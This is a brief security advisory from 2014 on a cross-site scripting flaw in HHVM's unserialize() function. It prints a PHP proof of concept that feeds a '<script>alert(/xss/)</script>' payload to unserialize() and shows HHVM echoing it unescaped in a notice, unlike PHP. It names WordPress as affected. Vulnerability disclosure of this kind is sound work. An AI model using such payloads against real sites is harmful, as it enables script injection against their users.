pch-016.md

XSS via Error Reporting Notices in HHVM's unserialize() Function

Taoguang Chen <@chtg> - 2014.10.31

<?php
unserialize('<script>alert(/xss/)</script>');

The outputs in PHP:

Notice: unserialize(): Error at offset 0 of 29 bytes in ...

The outputs in HHVM:

Notice: Unable to unserialize: [<script>alert(/xss/)</script>]. Expected ':' but got 's'. in ...

This issue can be exploited on a number of popular applications, such as: WordPress :)